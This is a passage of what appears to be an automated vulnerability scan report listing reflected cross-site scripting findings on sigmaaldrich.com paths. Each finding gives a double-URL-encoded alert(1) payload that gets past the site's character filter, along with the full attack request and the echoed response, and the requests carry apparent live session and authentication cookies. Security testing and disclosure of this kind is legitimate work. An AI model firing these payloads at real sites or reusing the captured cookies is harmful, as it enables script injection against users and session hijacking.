Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services40771";alert(1)//543c7fd8ffa/product-process-develop","E404") ;
   </script>
...[SNIP]...

1.203. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f46%2522%253balert%25281%2529%252f%252f7070efac145 was submitted in the REST URL parameter 6. This input was echoed as 82f46";alert(1)//7070efac145 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/product-process-develop82f46%2522%253balert%25281%2529%252f%252f7070efac145 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop82f46";alert(1)//7070efac145","E404") ;
   </script>
...[SNIP]...

1.204. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4fae%2522%253balert%25281%2529%252f%252f2dcc0c75c34 was submitted in the REST URL parameter 1. This input was echoed as c4fae";alert(1)//2dcc0c75c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentc4fae%2522%253balert%25281%2529%252f%252f2dcc0c75c34/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentc4fae";alert(1)//2dcc0c75c34/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.205. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de47%2522%253balert%25281%2529%252f%252f7682fdc4efd was submitted in the REST URL parameter 2. This input was echoed as 1de47";alert(1)//7682fdc4efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1de47%2522%253balert%25281%2529%252f%252f7682fdc4efd/customer-support/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1de47";alert(1)//7682fdc4efd/customer-support/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.206. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 754e9%2522%253balert%25281%2529%252f%252f12a70f23f98 was submitted in the REST URL parameter 3. This input was echoed as 754e9";alert(1)//12a70f23f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support754e9%2522%253balert%25281%2529%252f%252f12a70f23f98/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support754e9";alert(1)//12a70f23f98/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.207. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bf6d%2522%253balert%25281%2529%252f%252f0b69c6e9943 was submitted in the REST URL parameter 4. This input was echoed as 9bf6d";alert(1)//0b69c6e9943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service9bf6d%2522%253balert%25281%2529%252f%252f0b69c6e9943/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
